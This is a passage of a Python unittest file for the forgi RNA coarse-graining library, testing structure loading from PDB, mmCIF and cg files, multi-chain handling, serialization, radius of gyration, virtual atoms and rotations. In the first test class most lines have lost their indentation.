        log.info("Returning lines: %s", lines)
        return lines
    return mocked_run_mc_annotate
def mocked_read_config():
    """
    Require MC-Annotate for consistency. If not installed, tests should be skipped.

    Replaces forgi.config.read_config so tests always annotate with
    MC-Annotate regardless of the user's local configuration.
    """
    if not ftmc.which("MC-Annotate"):
        raise unittest.SkipTest("This Test requires MC-Annotate for consistency.")
    else:
        return {"PDB_ANNOTATION_TOOL": "MC-Annotate"}
@patch('forgi.config.read_config', mocked_read_config)
@patch('forgi.threedee.model.coarse_grain._run_mc_annotate',
mock_run_mc_annotate(ftmc._run_mc_annotate))
class CoarseGrainIoTest(tfgb.GraphVerification):
def check_cg_integrity(self, cg):
self.assertGreater(len(list(cg.stem_iterator())), 0)
for s in cg.stem_iterator():
edges = list(cg.edges[s])
if len(edges) < 2:
continue
multiloops = False
for e in edges:
if e[0] != 'i':
multiloops = True
if multiloops:
continue
self.assertFalse(np.allclose(cg.coords[edges[0]][0],
cg.coords[edges[1]][0]))
self.assertFalse(np.allclose(cg.coords[edges[0]][0],
cg.coords[edges[1]][1]))
self.assertFalse(np.allclose(cg.coords[edges[0]][1],
cg.coords[edges[1]][0]))
self.assertFalse(np.allclose(cg.coords[edges[0]][1],
cg.coords[edges[1]][1]))
def test_dssr_backslash_in_filename(self):
"""
DSSR puts the input filename in the JSON, which makes the JSON invalid,
if a backslash is in it. We patch the DSSR JSON before parsing.
"""
with make_temp_directory() as d:
# On Windows, bla is a directory, and the backslash is
# part of the path,
# on decent operating systems,
# the backslash is part of the filename.
filename=os.path.join(d, "bla\\something.pdb")
dir, rest = os.path.split(filename)
# On Windows, make the directory bla, on Linux do nothing
try:
os.makedirs(dir)
except OSError:
# Directory exists
pass
shutil.copy('test/forgi/threedee/data/1y26.pdb', filename)
try:
# Make sure we do not raise any error.
cg, = ftmc.CoarseGrainRNA.from_pdb(filename,
annotation_tool="DSSR")
except ftmc.AnnotationToolNotInstalled:
self.skipTest("This Test requires DSSR")
self.check_graph_integrity(cg)
self.assertGreater(len(cg.defines), 2)
def test_from_mmcif(self):
import Bio.PDB as bpdb
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1Y26.cif')
cg2, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1y26.pdb')
self.assertEqual(cg.defines, cg2.defines)
self.assertGreater(len(cg.defines), 3)
for d in cg.defines:
nptest.assert_almost_equal(cg.coords[d], cg2.coords[d])
def test_from_mmcif_missing_residues(self):
import Bio.PDB as bpdb
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/2x1f.cif', load_chains="B")
cg2, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/2X1F.pdb', load_chains="B")
log.error(cg.seq._missing_nts)
self.assertEqual(len(cg.seq._missing_nts), 3)
self.assertEqual(len(cg2.seq._missing_nts), 3)
self.assertEqual(cg.seq, cg2.seq)
def test_from_pdb(self):
import time
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains='E')
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/RS_363_S_5.pdb')
log.error(time.time() - now)
now = time.time()
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/RS_118_S_0.pdb')
log.error(time.time() - now)
now = time.time()
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
self.assertTrue(len(cg.defines) > 1)
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/ideal_1_4_5_8.pdb')
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/ideal_1_4_5_8.pdb')
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1y26_missing.pdb')
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1y26_two_chains.pdb',
load_chains='Y')
self.assertEqual(len(cg.defines), 1)
self.assertIn("f0", cg.defines)
self.assertEqual(cg.seq, "U")
log.error(time.time() - now)
now = time.time()
# commented out for 3 ec speedup
# cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1X8W.pdb',
# load_chains='A')
# self.check_cg_integrity(cg)
#log.error (time.time()-now); now=time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/1FJG_reduced.pdb')
self.check_cg_integrity(cg)
log.error(time.time() - now)
now = time.time()
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1y26.pdb')
log.error(time.time() - now)
now = time.time()
def test_file_with_numeric_chain_id(self):
# Numeric chain ids
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3J7A_part.pdb', load_chains=["7"])
self.check_cg_integrity(cg)
self.assertEqual(cg.seq._seqids[0].chain, '7')
def test_from_pdb_cofold(self):
# 1FUF triggers the if fromA.chain != fromB.chain clause in _are_adjacent_basepairs
cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1FUF.pdb',
dissolve_length_one_stems=True)
self.check_cg_integrity(cg)
def verify_multiple_chains(self, cg, single_chain_cgs):
log.warning("Backbone in %s breaks after %s",
cg.name, cg.backbone_breaks_after)
self.assertEqual(len(cg.backbone_breaks_after),
len(single_chain_cgs) - 1)
self.assertEqual(cg.seq_length, sum(
x.seq_length for x in single_chain_cgs))
# There might be stems spanning multiple chains.
self.assertGreaterEqual(len([s for s in cg.defines if s[0] == "s"]), len(
[s for c in single_chain_cgs for s in c.defines if s[0] == "s"]))
self.assertEqual(cg.seq, "&".join(str(x.seq)
for x in single_chain_cgs))
def test_from_pdb_f_in_second_chain(self):
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains=None)
self.assertEqual(set(cg.defines.keys()), set(["t0", "s0", "f0"]))
    def test_from_pdb_multiple(self):
        """Loading all chains at once must agree with loading them one by one."""
        cgE, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/4GV9.pdb', load_chains='E')
        cgF, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/4GV9.pdb', load_chains='F')
        cg, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/4GV9.pdb', load_chains=None)
        self.assertEqual(set(cg.chains.keys()), set(["E", "F"]))
        # Two chains -> exactly one backbone cutpoint in the merged cg.
        self.assertEqual(len(cg.backbone_breaks_after), 1)
        bp = cg.backbone_breaks_after[0]
        self.assertEqual(bp, 3)
        # NOTE(review): both slices below are expected to equal chain E's
        # sequence -- presumably forgi sequences are 1-based so seq[:bp] and
        # seq[1:bp] denote the same residues; confirm against forgi's Seq class.
        self.assertEqual(cg.seq[:bp], cgE.seq)
        self.assertEqual(cg.seq[1:bp], cgE.seq)
        self.assertEqual(cg.seq[bp + 1:], cgF.seq)
        self.verify_multiple_chains(cg, [cgE, cgF])
        # Same consistency check for a three-chain structure.
        cgA, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/3CQS.pdb', load_chains='A')
        cgB, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/3CQS.pdb', load_chains='B')
        cgC, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/3CQS.pdb', load_chains='C')
        cg, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/3CQS.pdb', load_chains=None)
        log.warning("cg now has %s cutpoints: %s", len(
            cg.seq._breaks_after), cg.backbone_breaks_after)
        self.verify_multiple_chains(cg, [cgA, cgB, cgC])
def test_multiple_chain_to_cg(self):
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/4GV9.pdb', load_chains=None)
log.debug("======= FIRST IS LOADED =========")
cg_str = cg.to_cg_string()
log.debug("\n" + cg_str)
print(cg_str)
cg2 = ftmc.CoarseGrainRNA.from_bg_string(cg_str)
self.assertEqual(cg.defines, cg2.defines)
self.assertLess(ftme.cg_rmsd(cg, cg2), 10**-6)
self.assertEqual(cg.backbone_breaks_after, cg2.backbone_breaks_after)
cg, = ftmc.CoarseGrainRNA.from_pdb(
'test/forgi/threedee/data/3CQS.pdb', load_chains=None)
cg.log(logging.WARNING)
cg_str = cg.to_cg_string()
cg2 = ftmc.CoarseGrainRNA.from_bg_string(cg_str)
self.assertEqual(cg.defines, cg2.defines)
# This only looks at stems
self.assertLess(ftme.cg_rmsd(cg, cg2), 10**-6)
self.assertEqual(cg.backbone_breaks_after, cg2.backbone_breaks_after)
def test_connected_cgs_from_pdb(self):
cgs = ftmc.CoarseGrainRNA.from_pdb("test/forgi/threedee/data/1DUQ.pdb")
self.assertEqual(len(cgs), 4)
# This PDB file contains 4 similar RNA dimers
self.assertEqual(cgs[0].name, "1DUQ_A-B")
self.assertEqual(cgs[1].name, "1DUQ_C-D")
self.assertEqual(cgs[2].name, "1DUQ_E-F")
self.assertEqual(cgs[3].name, "1DUQ_G-H")
self.assertEqual(cgs[0].defines, cgs[2].defines)
self.assertEqual(cgs[1].defines, cgs[3].defines)
def test_multiple_models_in_file(self):
with self.assertWarns(UserWarning) if hasattr(self, 'assertWarns') else ignore_warnings():
cgs = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1byj.pdb')
self.assertEqual(len(cgs), 1) # Only look at first model!
    def test_annotating_with_dssr(self):
        # Placeholder: DSSR-based annotation is not exercised by this suite yet.
        pass
class CoarseGrainTest(tfgb.GraphVerification):
    '''
    Simple tests for the BulgeGraph data structure.

    For now the main objective is to make sure that a graph is created
    and nothing crashes in the process. In the future, test cases for
    bugs should be added here.
    '''

    def setUp(self):
        # Show full diff output in addition to any msg= argument.
        self.longMessage = True

    def check_cg_integrity(self, cg):
        """Assert that the two non-multiloop neighbors of each stem do not
        share an endpoint coordinate (which would indicate collapsed geometry)."""
        for s in cg.stem_iterator():
            edges = list(cg.edges[s])
            if len(edges) < 2:
                continue
            # Skip stems that border anything other than interior loops.
            multiloops = False
            for e in edges:
                if e[0] != 'i':
                    multiloops = True
            if multiloops:
                continue
            # Compare both endpoints of both neighbors pairwise.
            self.assertFalse(np.allclose(cg.coords[edges[0]][0],
                                         cg.coords[edges[1]][0]))
            self.assertFalse(np.allclose(cg.coords[edges[0]][0],
                                         cg.coords[edges[1]][1]))
            self.assertFalse(np.allclose(cg.coords[edges[0]][1],
                                         cg.coords[edges[1]][0]))
            self.assertFalse(np.allclose(cg.coords[edges[0]][1],
                                         cg.coords[edges[1]][1]))

    def compare_bg_to_cg(self, bg, cg):
        """Assert that every define and edge of bg is present and equal in cg."""
        for d in bg.defines.keys():
            self.assertTrue(d in cg.defines.keys())
            self.assertTrue(bg.defines[d] == cg.defines[d])
        for e in bg.edges.keys():
            self.assertTrue(e in cg.edges.keys())
            self.assertTrue(bg.edges[e] == cg.edges[e])

    def test_get_node_from_residue_num(self):
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1X8W.pdb',
                                           load_chains='A', dissolve_length_one_stems=True)
        self.check_cg_integrity(cg)
        elem_name = cg.get_node_from_residue_num(1)
        cg.log()
        # Residue 1 lies in the 5' unpaired region.
        self.assertEqual(elem_name, "f0")

    def test_from_cg(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        self.check_graph_integrity(cg)
        self.check_cg_integrity(cg)
        # self.assertEqual(len(cg.coords), 8)
        # Every defined element must have coordinates.
        for key in cg.defines.keys():
            self.assertTrue(key in cg.coords)

    def test_from_and_to_cgstring(self):
        """Serialization to a cg string and back preserves defines and coords."""
        cg1 = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        cg1.project_from = np.array([1, 2, 3.5])
        stri = cg1.to_cg_string()
        cg2 = ftmc.CoarseGrainRNA.from_bg_string(stri)
        # Check both directions so neither cg has extra elements.
        for key in set(cg1.defines):
            self.assertTrue(key in cg2.defines)
            self.assertTrue(key in cg2.coords)
            nptest.assert_allclose(cg1.defines[key], cg2.defines[key])
            nptest.assert_allclose(cg1.coords[key][0], cg2.coords[key][0])
            nptest.assert_allclose(cg1.coords[key][1], cg2.coords[key][1])
        for key in set(cg2.defines):
            self.assertTrue(key in cg1.defines)
            self.assertTrue(key in cg1.coords)
            nptest.assert_allclose(cg1.defines[key], cg2.defines[key])
            nptest.assert_allclose(cg1.coords[key][0], cg2.coords[key][0])
            nptest.assert_allclose(cg1.coords[key][1], cg2.coords[key][1])
        nptest.assert_allclose(cg1.project_from, cg2.project_from)

    def test_to_and_from_cgstring_vres(self):
        """Virtual residue positions survive a cg-string round trip."""
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
        cg.add_all_virtual_residues()
        cgstri = cg.to_cg_string()
        self.assertIn("vres", cgstri)
        cg2 = ftmc.CoarseGrainRNA.from_bg_string(cgstri)
        # One virtual residue per nucleotide of the hairpin.
        self.assertEqual(
            len(cg2.vposs["h0"]), cg2.defines["h0"][1] - cg2.defines["h0"][0] + 1)
        self.assertLess(ftuv.vec_distance(
            cg.vposs["h0"][0], cg2.vposs["h0"][0]), 10**-8)
        self.assertLess(ftuv.vec_distance(
            cg.vposs["i0"][2], cg2.vposs["i0"][2]), 10**-8)

    def test_get_bulge_angle_stats_core(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        self.check_graph_integrity(cg)
        # Must not raise for any multiloop segment.
        for d in cg.mloop_iterator():
            cg.get_bulge_angle_stats(d)

    def test_get_bulge_angle_stats_for_start(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        s1, s2 = cg.get_bulge_angle_stats("start")

    def test_read_longrange_interactions(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        self.check_graph_integrity(cg)
        self.assertGreater(len(cg.longrange), 0)

    def test_radius_of_gyration(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        self.check_graph_integrity(cg)
        rog = cg.radius_of_gyration()
        self.assertGreater(rog, 0.)
        maxDist = max(ftuv.vec_distance(p0, p1) for p0, p1 in it.combinations(cg.coords._coordinates, 2))
        estimated_radius_circum_cricle = maxDist / 2
        # NOTE: The ROG is 0.77 times the radius of the circumcircle, for m->inf many points
        # in a 3D unit sphere with the nth point placed at radius (n/m)**1/3
        self.assertLess(rog, estimated_radius_circum_cricle * 0.77)

    def test_radius_of_gyration_different_methods(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        rog_fast = cg.radius_of_gyration(method="fast")
        rog_vres = cg.radius_of_gyration(method="vres")
        print(rog_fast, rog_vres, rog_fast - rog_vres, file=sys.stderr)
        self.assertGreater(abs(rog_fast - rog_vres), 0, msg="Different methods for ROG calculation "
                           "producting the exactly same result? Something seems to be wrong.")
        self.assertLess(abs(rog_fast - rog_vres), 3, msg="Different methods for ROG calculation "
                        "should produce roughly the same result.")

    def test_radius_of_gyration_no_stems(self):
        # A structure without stems has no defined ROG.
        cg, = ftmc.CoarseGrainRNA.from_fasta_text("AUCG\n....")
        cg.coords["f0"] = [0, 0, 0.], [12., 1, 1]
        self.assertTrue(math.isnan(cg.radius_of_gyration()))

    def test_get_sides(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1gid.cg')
        self.check_graph_integrity(cg)
        self.check_cg_integrity(cg)
        log.info(cg.to_dotbracket_string())
        log.info(cg.to_element_string(True))
        # The file 1gid.cg still starts with f1, not f0
        (s1b, s1e) = cg.get_sides('s0', 'f1')
        (s1b, s1e) = cg.get_sides('s8', 't1')

    '''
    def test_cg_from_sg(self):
        bg = ftmc.CoarseGrainRNA(
            dotbracket_str='.(((((..(((.(((((((.((.((((..((((((....))))))..)))).)).))........(((((.....((((...((((....))))...))))...))))).))))).)))...)))))')
        self.check_graph_integrity(bg)
        # bg = cgb.BulgeGraph(dotbracket_str='.(((((........)))))..((((((((.(((.((...........((((((..(((((.((((((((..(((..)))...((((....)))).....))))))))..)))))................((((((...........))))))..((...(((((((...((((((..)))))).....((......))....)))))))...(((((((((.........))))))))).(((....))).))..........(((((.(((((.......))))))))))..........))))..))............(((.((((((((...((.......))...))))))..))))).........((((((((((((..(((((((((......))))))..))).((((.......)))).....)))))..))..))).))....((...............))....))..)))))))))))...')
        for j in range(40):
            sg = bg.random_subgraph()
            new_cg = cg_from_sg(bg, sg)
            for i in it.chain(new_cg.iloop_iterator(), new_cg.mloop_iterator()):
                c = new_cg.connections(i)
                if len(c) != 2:
                    self.assertEqual(len(c), 2)
    '''

    def test_get_stem_stats(self):
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
        cg.get_stem_stats("s0")

    def test_get_angle_stats(self):
        """get_bulge_angle_stats must not raise for any interior/multi loop."""
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
        for d in cg.defines:
            if d[0] in "mi":
                cg.get_bulge_angle_stats(d)
        # NOTE(review): indentation reconstructed -- the warning suppression is
        # assumed to cover the noisy PDB loads below; confirm against upstream.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1byj.pdb')
            for d in cg.defines:
                if d[0] in "mi":
                    cg.get_bulge_angle_stats(d)
            cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2QBZ.pdb')
            for d in cg.defines:
                if d[0] in "mi":
                    cg.get_bulge_angle_stats(d)

    def test_get_loop_stat(self):
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2mis.pdb')
        cg.get_loop_stat("h0")
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/4GXY_A.cg')  # Contains a loop with r=0
        self.check_graph_integrity(cg)
        self.check_cg_integrity(cg)
        cg.get_loop_stat('h3')

    def test_length_one_stems(self):
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1byj.pdb',
                                               remove_pseudoknots=False)
            self.check_graph_integrity(cg)
            self.check_cg_integrity(cg)
            cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2QBZ.pdb',
                                               remove_pseudoknots=False)
            self.check_graph_integrity(cg)
            self.check_cg_integrity(cg)

    def test_pseudoknot(self):
        #cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/1ymo.pdb')
        # self.check_graph_integrity(cg)
        # self.check_cg_integrity(cg)
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/3D0U_A.cg')
        self.check_graph_integrity(cg)
        self.check_cg_integrity(cg)
        cg.traverse_graph()
        self.assertEqual(cg.get_angle_type("i3"), 1)

    def test_small_molecule(self):
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2X1F.pdb')
        log.info(cg.to_dotbracket_string())
        log.info(cg.to_element_string(True))
        log.info("COORDS {}".format(cg.coords))
        self.assertTrue('f0' in cg.coords)

    def test_longrange_iterator(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        interactions = list(cg.longrange_iterator())
        self.assertEqual(len(interactions), 4)
        self.assertTrue(('i0', 's0') in interactions)

    def test_longrange_distance(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        dist = cg.element_physical_distance('h0', 'h1')
        self.assertTrue(dist < 10)

    def test_total_length(self):
        # total_length must equal seq_length regardless of the input source.
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        self.assertEqual(cg.total_length(), cg.seq_length)
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2X1F.pdb')
        self.assertEqual(cg.total_length(), cg.seq_length)
        cg = ftmc.CoarseGrainRNA.from_dotbracket('..((..((...))..))..((..))..')
        self.assertEqual(cg.total_length(), cg.seq_length)
        self.assertEqual(cg.total_length(), 27)

    def test_get_load_coordinates(self):
        """Zeroed coordinates are fully restored by load_coordinates_array."""
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        coords = cg.get_coordinates_array()
        new_cg = copy.deepcopy(cg)
        for key in new_cg.coords:
            new_cg.coords[key] = [0, 0, 0], [0, 0, 0]
        new_cg.load_coordinates_array(coords)
        for key in new_cg.coords:
            for i in range(len(new_cg.coords[key])):
                nptest.assert_allclose(new_cg.coords[key][i],
                                       cg.coords[key][i])

    """
    def test_is_stacking(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file('test/forgi/threedee/data/3way.cg')
        self.assertFalse(cg.is_stacking("m0")) #Distance
        self.assertFalse(cg.is_stacking("m1")) #distance
        self.assertFalse(cg.is_stacking("m2")) #shear angle

    def test_is_stacking2(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file('test/forgi/threedee/data/1I9V_noPK.cg')
        self.assertFalse(cg.is_stacking("m0"))
        self.assertFalse(cg.is_stacking("m2"))
        self.assertTrue(cg.is_stacking("m1"))
    """

    def test_coords_from_direction(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1I9V_noPK.cg')
        cg_old = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1I9V_noPK.cg')
        coords = cg.get_coordinates_array()
        directions = coords[1::2] - coords[0::2]
        cg._init_coords()
        cg.coords_from_directions(directions)
        # self.assertAlmostEqual(ftme.cg_rmsd(cg, cg_old), 0) #This only looks at stems
        # The coordinates should be the same as before except for a constant offset
        new_coords = cg.get_coordinates_array()
        offset = (coords - new_coords)
        print(offset)
        # I use allclose, because it uses broadcasting
        assert np.allclose(offset, offset[0])

    def test_coords_from_direction_with_pseudoknot(self):
        # This tests the case where the link is inserted from reverse direction.
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/3D0U_A.cg')
        cg_old = copy.deepcopy(cg)
        coords = cg.get_coordinates_array()
        directions = cg.coords_to_directions()
        cg._init_coords()
        cg.twists = cg_old.twists
        log.info("len(coords):{}, len(directions):{}, len(defines):{}".format(
            len(coords), len(directions), len(cg.defines)))
        cg.coords_from_directions(directions)
        self.assertLess(ftme.cg_rmsd(cg, cg_old), 10**-6)
        new_coords = cg.get_coordinates_array()
        offset = (coords - new_coords)
        assert np.allclose(offset, offset[0])

    @unittest.skip("It is hard to do the subgraph thing correctly in a way consistent with the RNA model. Thus it has been disabled in the current release!")
    def test_cg_from_sg_invalid_subgraph_breaking_m(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/3D0U_A.cg')
        """
            /s3 --h1
         m1    |
        /      |
      s0       m2
        \      |
         m0    |
          \s1--i0--s2--h0
        """
        # Splitting here leaves a dangling multiloop -> must raise.
        split_ml = ["s0", "m0", "s1"]
        with self.assertRaises(Exception):
            ftmc.cg_from_sg(cg, split_ml)

    @unittest.skip("It is hard to do the subgraph thing correctly in a way consistent with the RNA model. Thus it has been disabled in the current release!")
    def test_cg_from_sg_breaking_after_i(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/3D0U_A.cg')
        """
            /s3 --h1
         m1    |
        /      |
      s0       m2
        \      |
         m0    |
          \s1--i0--s2--h0
        """
        split_ml = ["s0", "m0", "s1", "m2", "s3", "m1", "h1", "i0"]
        sg = ftmc.cg_from_sg(cg, split_ml)
        self.check_graph_integrity(sg)

    @unittest.skip("It is hard to do the subgraph thing correctly in a way consistent with the RNA model. Thus it has been disabled in the current release!")
    def test_cg_from_sg_breaking_after_s(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/3D0U_A.cg')
        """
            /s3 --h1
         m1    |
        /      |
      s0       m2
        \      |
         m0    |
          \s1--i0--s2--h0
        """
        split_ml = ["s0", "m0", "s1", "m2", "s3", "m1", "h1"]
        sg = ftmc.cg_from_sg(cg, split_ml)
        self.check_graph_integrity(sg)
class TestVirtualAtoms(unittest.TestCase):
    """Sanity checks for virtual atom positions on coarse-grained RNA."""

    def setUp(self):
        self.longMessage = True

    def _c1_distance(self, cg, res_a, res_b):
        """Return the distance between the C1' virtual atoms of two residues."""
        va_a = cg.virtual_atoms(res_a)["C1'"]
        va_b = cg.virtual_atoms(res_b)["C1'"]
        return ftuv.vec_distance(va_a, va_b)

    @unittest.skip("This test currently fails. Should be fixed in version 0.5")
    def test_virtual_atoms_only_single_stranded(self):
        cg, = ftmc.CoarseGrainRNA.from_pdb('test/forgi/threedee/data/2X1F.pdb')
        va = cg.virtual_atoms(1)
        self.assertIn("C1'", va)  # C1' should be always present

    def test_virtual_atoms_stem_distance_to_pairing_partner(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        distance = self._c1_distance(cg, 1, cg.pairing_partner(1))
        self.assertLess(distance, 25, msg="Virtual atoms too far apart")
        self.assertGreater(distance, 8, msg="Virtual atoms too close")

    def test_virtual_atoms_stem_distance_to_stacked_base(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        distance = self._c1_distance(cg, 1, 2)
        self.assertLess(distance, 10, msg="Virtual atoms too far apart")
        self.assertGreater(distance, 2, msg="Virtual atoms too close")

    def test_virtuel_atom_caching_is_reset(self):
        cg = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        va_old = cg.virtual_atoms(1)["C1'"]
        # Stay orthogonal to twists
        start, end = cg.coords["s0"]
        cg.coords["s0"] = start + (end - start) * 0.5, end
        va_new = cg.virtual_atoms(1)["C1'"]
        self.assertTrue(np.any(np.not_equal(va_old, va_new)),
                        msg="A stale virtual atom position was used.")
class RotationTranslationTest(unittest.TestCase):
    """Tests that rigid rotations of a cg preserve its internal geometry."""

    def setUp(self):
        self.cg1 = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            self.cg2, = ftmc.CoarseGrainRNA.from_pdb(
                'test/forgi/threedee/data/1byj.pdb')

    def test_rotate_keeps_RMSD_zero0(self):
        # Rotating forth and back must give RMSD ~ 0.
        cg1_rot = copy.deepcopy(self.cg1)
        cg1_rot.rotate(30, unit="degrees")
        cg1_rot.rotate(-30, unit="degrees")
        self.assertLess(ftme.cg_rmsd(self.cg1, cg1_rot), 10**-6)

    def test_rotate_keeps_RMSD_zero(self):
        # RMSD is invariant under a single rigid rotation.
        cg1_rot = copy.deepcopy(self.cg1)
        cg1_rot.rotate(30, unit="degrees")
        # This currently uses virtual atoms, thus takes twists into account.
        self.assertLess(ftme.cg_rmsd(self.cg1, cg1_rot), 10**-6)
        cg2_rot = copy.deepcopy(self.cg2)
        cg2_rot.rotate(45, unit="degrees")
        a, b = self.cg2.get_ordered_virtual_residue_poss(True)
        log.warning("------------------------")
        c, d = cg2_rot.get_ordered_virtual_residue_poss(True)
        # Undo the rotation on the virtual residue positions.
        # NOTE(review): rotate() apparently rotates about the x axis -- the
        # inverse is applied here; confirm against CoarseGrainRNA.rotate.
        c2 = np.dot(c, ftuv.rotation_matrix("x", math.radians(-45)).T)
        log.warning("==================================")
        # Log any virtual residue that did not map back onto its original.
        for i, coord in enumerate(a):
            if any(abs(coord - c2[i]) > 10**-4):
                log.warning("%s %s %s %s", coord, b[i], c2[i], d[i])
        self.assertLess(ftme.cg_rmsd(self.cg2, cg2_rot), 10**-6)
class StericValueTest(unittest.TestCase):
    """Manual/visual inspection of the steric_value field (not run in CI)."""

    def setUp(self):
        self.cg1 = ftmc.CoarseGrainRNA.from_bg_file(
            'test/forgi/threedee/data/1y26.cg')
        self.cg2, = ftmc.CoarseGrainRNA.from_pdb(
            'test/forgi/threedee/data/1byj.pdb')

    @unittest.skip("Manual test")
    def test_stericValue_1(self):
        # Visualizes steric_value on a 3D grid with mayavi; requires a display
        # and the mayavi package, hence permanently skipped.
        print("m0, m1, m2", self.cg1.steric_value(["m0", "m1", "m2"]))
        from_ = np.amin(self.cg1.coords._coordinates)
        to_ = np.amax(self.cg1.coords._coordinates)
        # Sample the bounding box with a grid spacing of 4.
        x, y, z = np.mgrid[from_:to_:4, from_:to_:4, from_:to_:4]
        from mayavi import mlab
        s = np.zeros_like(x)
        for i, j, k in np.ndindex(x.shape):
            s[i, j, k] = self.cg1.steric_value(
                np.array([x[i, j, k], y[i, j, k], z[i, j, k]]), "r**-3")
        #mlab.contour3d(x,y,z,s, contours= [0.5, 1, 2, 5], opacity=0.3)
        src = mlab.pipeline.scalar_field(x, y, z, s)
        mlab.pipeline.volume(src)
        #mlab.pipeline.iso_surface(src, contours=[0.1, ], opacity=0.3)
        #mlab.pipeline.iso_surface(src, contours=[0.5, ], opacity=0.7)
        #mlab.pipeline.iso_surface(src, contours=[1, ])
        # One color per coarse-grain element type.
        colors = {"s": (0, 1, 0), "h": (0, 0, 1), "m": (1, 0, 0), "i": (
            1, 1, 0), "f": (0.5, 0.5, 0.5), "t": (0.5, 0.5, 0.5)}
